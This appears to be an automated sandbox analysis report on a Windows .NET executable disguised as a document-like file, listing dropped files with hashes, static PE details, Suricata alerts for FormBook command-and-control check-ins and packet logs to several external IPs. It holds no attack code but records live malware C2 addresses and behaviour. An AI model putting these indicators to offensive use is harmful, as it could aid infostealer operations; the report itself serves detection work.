Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.2.6.9.8.4.2.8.9.3.3.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.2.6.9.8.5.6.4.8.7.0.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.7.5.7.8.2.4.-.e.9.7.9.-.4.6.a.1.-.a.7.2.f.-.f.1.0.a.4.c.d.9.5.f.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.6.e.c.a.7.6.-.0.0.8.3.-.4.d.a.e.-.9.0.d.c.-.7.6.5.a.f.4.1.7.5.3.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.R.N.#. .D.7.5.2.1.-.R.N.-.0.0.3.5.3. . .R.E.V.-.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.r.a.n.s.p.o.n.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.8.c.-.0.0.0.1.-.0.0.1.4.-.6.9.c.f.-.2.e.d.5.0.e.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.8.7.8.5.3.e.9.0.f.6.0.5.6.a.0.6.1.c.8.9.8.f.b.9.d.3.d.a.1.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.0.4.9.7.0.9.9.6.2.b.d.4.7.3.3.e.1.9.f.a.d.e.c.7.c.7.e.8.8.0.b.1.2.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF40C.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Sep 26 12:23:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	373149
Entropy (8bit):	3.334659797684535
Encrypted:	false
SSDEEP:	3072:0w8aG3h4VQfcSUspknFD1CCqnELN3+vfdqx2YDlJ:0Dv3hXxkqnU3QFY
MD5:	48A754AEB35B2832D5756F528911BC98
SHA1:	A74E59A0A8C9E275291622E6ACA746B209C9FF08
SHA-256:	84EB26C052C778248703329A9FEAAC809F700F979D872C72C1530E9158022865
SHA-512:	54E3F5C408694FDB652CBCB0B8CC3CA7C10A42E5625624E77682D046D112B90F104E2C527620A24B69AF1ED2C7392D0EC3C5B9B3836F03EA90874FDA626A4AB0
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......)R.f....................................$...h....................D...n..........l.......8...........T............(...............6..........x8..............................................................................eJ.......9......Lw......................T...........&R.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7F5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8652
Entropy (8bit):	3.7158379321813784
Encrypted:	false
SSDEEP:	192:R6l7wVeJS3M6Y91LR7gmfc6JQprT89bsj/fKkm:R6lXJ6M6YLdgmfciBs7fI
MD5:	0C31919FE313B54CCDC4B8C47CCDD62A
SHA1:	B98F8B9AE6235C70C089583FB9F1C79A73800F44
SHA-256:	68885A706FFDA2CCD13E24F6A17D3638DBAB24BB7648C60D2D385A3691262064
SHA-512:	91A15CA121DF05950DFFE1D50EBE630731AAADD0565DFFF31EFAE5169C42877ABCEA9163CD47D035286AFF463B6711D73B0D89BFBC8668D6D6D98C14A4796C8B
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF854.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4833
Entropy (8bit):	4.547281385292699
Encrypted:	false
SSDEEP:	48:cvIwWl8zspJg771I969WpW8VYjcYm8M4JnAFOyq85hlxzY4NQd:uIjf7I7tM7VMJHWFNQd
MD5:	8F242E3E74A00A0B8AD20E5C266B7BC7
SHA1:	47F1A5D81400D811E4D3264560C9A3506494B8E1
SHA-256:	2307922767578E7D94D11B4AA1D2C4E2C5DE06746BB01FA78A5B6B1EF96C50DF
SHA-512:	D2F40EB46E22732DC2051265E3DC72CE2C496C340C199ABAD6B335AA723E335001627122505DF5F8DADDB4C02AFD3238FF492549D7F6DE1830CAF853F242A0D4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517165" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\23X395L

Download File

Process:	C:\Windows\SysWOW64\auditpol.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465827947929309
Encrypted:	false
SSDEEP:	6144:kIXfpi67eLPU9skLmb0b4xWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSbg:ZXD94xWlLZMM6YFHn+g
MD5:	256D89F12C726F7155B5D41D0BF84C6B
SHA1:	438E18F376D521209FD445774D53C28CA1A78E46
SHA-256:	87A8D43F097B3D13DE8CED7393865B6CD79EE5D3C962D4957851960C2285E124
SHA-512:	0F6C49847BAB3FE09E25EA5B4D68CC2A57635D8FB7F4FF91A94C3F2E9F533DB38E4B3B1C0379A881CECAE0D479860DDB8E5ACD356B7E6A8C429402B2A7FC7214
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr=.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.230067500740375
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	RN# D7521-RN-00353 REV-2.exe
File size:	2'061'855 bytes
MD5:	c001445a0c5badffefe083fe87340ced
SHA1:	049709962bd4733e19fadec7c7e880b12244dc9d
SHA256:	07a0addcc135c1bc4c8145e1c924052bde63780f807a5ea02b20769787eff420
SHA512:	fc82cb12505732de0161321079d8e3d87025e91b718aef8423d1734d47e1a4a338d00624e30828d447b5d22fd5a8df7fe77f5388383dd44d7fd3640c05f27dc4
SSDEEP:	12288:bdZOxloxwF94INBbzKTkeu+7S1QjX/Lc5fSWEiU3o31uZ9Sy41:TOHZ/4IheuTpq073Y5S
TLSH:	E69512A8BA470C9BFC061239D6C5B5F110FC8D8375F2E46FDF144D226A641BCAB259B2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..f.........."...0.L8............... ....@...... ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F2A468 [Tue Sep 24 11:37:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x5ea	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x384c	0x3a00	f003d349c271aa8d0e75d4403c5a6ee8	False	0.632879849137931	data	6.194908345638003	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x5ea	0x600	57d280fb4b749a5ff5990ae311254c9e	False	0.4212239583333333	data	4.1460215092223	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x60a0	0x360	data			0.41087962962962965
RT_MANIFEST	0x6400	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T14:23:50.378242+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49742	147.92.40.174	80	TCP
2024-09-26T14:24:22.814280+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49747	203.161.43.245	80	TCP
2024-09-26T14:24:35.998820+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49751	13.248.169.48	80	TCP
2024-09-26T14:24:50.074829+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49755	44.213.25.70	80	TCP
2024-09-26T14:25:03.264303+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49759	3.33.130.190	80	TCP
2024-09-26T14:25:16.413058+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49763	3.33.130.190	80	TCP
2024-09-26T14:25:30.879325+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49767	103.255.237.233	80	TCP
2024-09-26T14:25:44.963690+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49771	3.33.130.190	80	TCP
2024-09-26T14:26:08.795017+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49775	221.121.144.149	80	TCP
2024-09-26T14:26:22.261486+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49779	85.159.66.93	80	TCP
2024-09-26T14:26:35.577429+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49783	50.3.111.89	80	TCP
2024-09-26T14:26:56.802703+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49787	3.33.130.190	80	TCP
2024-09-26T14:27:10.357134+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49791	13.248.252.114	80	TCP
2024-09-26T14:27:19.549092+0200	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49792	147.92.40.174	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 14:23:49.288762093 CEST	49742	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:23:49.293689966 CEST	80	49742	147.92.40.174	192.168.2.4
Sep 26, 2024 14:23:49.293781042 CEST	49742	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:23:49.300483942 CEST	49742	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:23:49.305581093 CEST	80	49742	147.92.40.174	192.168.2.4
Sep 26, 2024 14:23:50.377820969 CEST	80	49742	147.92.40.174	192.168.2.4
Sep 26, 2024 14:23:50.378149033 CEST	80	49742	147.92.40.174	192.168.2.4
Sep 26, 2024 14:23:50.378242016 CEST	49742	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:23:50.381222963 CEST	49742	80	192.168.2.4	147.92.40.174
Sep 26, 2024 14:23:50.386104107 CEST	80	49742	147.92.40.174	192.168.2.4
Sep 26, 2024 14:24:14.101572990 CEST	49744	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:14.107503891 CEST	80	49744	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:14.107620955 CEST	49744	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:14.119827032 CEST	49744	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:14.124758959 CEST	80	49744	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:14.719847918 CEST	80	49744	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:14.720073938 CEST	80	49744	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:14.720180988 CEST	49744	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:15.631288052 CEST	49744	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:16.649626017 CEST	49745	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:17.113729000 CEST	80	49745	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:17.113970041 CEST	49745	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:17.125307083 CEST	49745	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:17.130425930 CEST	80	49745	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:17.707094908 CEST	80	49745	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:17.707304001 CEST	80	49745	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:17.707438946 CEST	49745	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:18.632507086 CEST	49745	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:19.650965929 CEST	49746	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:19.657160997 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.657252073 CEST	49746	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:19.672338963 CEST	49746	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:19.677277088 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677356005 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677369118 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677380085 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677474022 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677587986 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677735090 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677747011 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:19.677757978 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:20.262463093 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:20.263150930 CEST	80	49746	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:20.263252020 CEST	49746	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:21.178332090 CEST	49746	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:22.198262930 CEST	49747	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:22.203314066 CEST	80	49747	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:22.203442097 CEST	49747	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:22.213630915 CEST	49747	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:22.218518972 CEST	80	49747	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:22.813498020 CEST	80	49747	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:22.814194918 CEST	80	49747	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:22.814280033 CEST	49747	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:22.817580938 CEST	49747	80	192.168.2.4	203.161.43.245
Sep 26, 2024 14:24:22.823682070 CEST	80	49747	203.161.43.245	192.168.2.4
Sep 26, 2024 14:24:27.851593971 CEST	49748	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:27.856765985 CEST	80	49748	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:27.856882095 CEST	49748	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:27.871404886 CEST	49748	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:27.876389980 CEST	80	49748	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:28.328015089 CEST	80	49748	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:28.331331968 CEST	49748	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:29.403877020 CEST	49748	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:29.408740997 CEST	80	49748	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:30.417855978 CEST	49749	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:30.422980070 CEST	80	49749	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:30.423213005 CEST	49749	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:30.437864065 CEST	49749	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:30.443244934 CEST	80	49749	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:30.886025906 CEST	80	49749	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:30.886107922 CEST	49749	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:31.943788052 CEST	49749	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:31.948782921 CEST	80	49749	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:32.968904018 CEST	49750	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:32.974793911 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:32.975071907 CEST	49750	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:32.994908094 CEST	49750	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:32.999880075 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:32.999891996 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:32.999898911 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:32.999905109 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:32.999964952 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:33.000046968 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:33.000119925 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:33.000127077 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:33.000133991 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:33.445511103 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:33.445626020 CEST	49750	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:34.506467104 CEST	49750	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:34.511662960 CEST	80	49750	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:35.525470018 CEST	49751	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:35.530750036 CEST	80	49751	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:35.530937910 CEST	49751	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:35.539439917 CEST	49751	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:35.551239967 CEST	80	49751	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:35.998577118 CEST	80	49751	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:35.998624086 CEST	80	49751	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:35.998820066 CEST	49751	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:36.008521080 CEST	49751	80	192.168.2.4	13.248.169.48
Sep 26, 2024 14:24:36.014405966 CEST	80	49751	13.248.169.48	192.168.2.4
Sep 26, 2024 14:24:41.039994955 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:41.044924021 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:41.044998884 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:41.055538893 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:41.060493946 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.330480099 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.330751896 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.330765009 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.330775976 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.330852985 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.330852985 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.345171928 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345185995 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345195055 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345251083 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.345278025 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345288038 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345298052 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345308065 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345319033 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345329046 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.345349073 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.345371008 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.345825911 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345837116 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345846891 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.345875025 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.399796009 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.419198036 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.419323921 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.419337988 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.419369936 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.419418097 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.419428110 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.419464111 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.441967964 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.441981077 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.441992998 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.441998005 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.442060947 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.442102909 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.442128897 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.442187071 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.442281961 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.442370892 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.442380905 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.442414999 CEST	49752	80	192.168.2.4	44.213.25.70
Sep 26, 2024 14:24:42.442544937 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.442563057 CEST	80	49752	44.213.25.70	192.168.2.4
Sep 26, 2024 14:24:42.442572117 CEST	80	49752	44.213.25.70	192.168.2.4
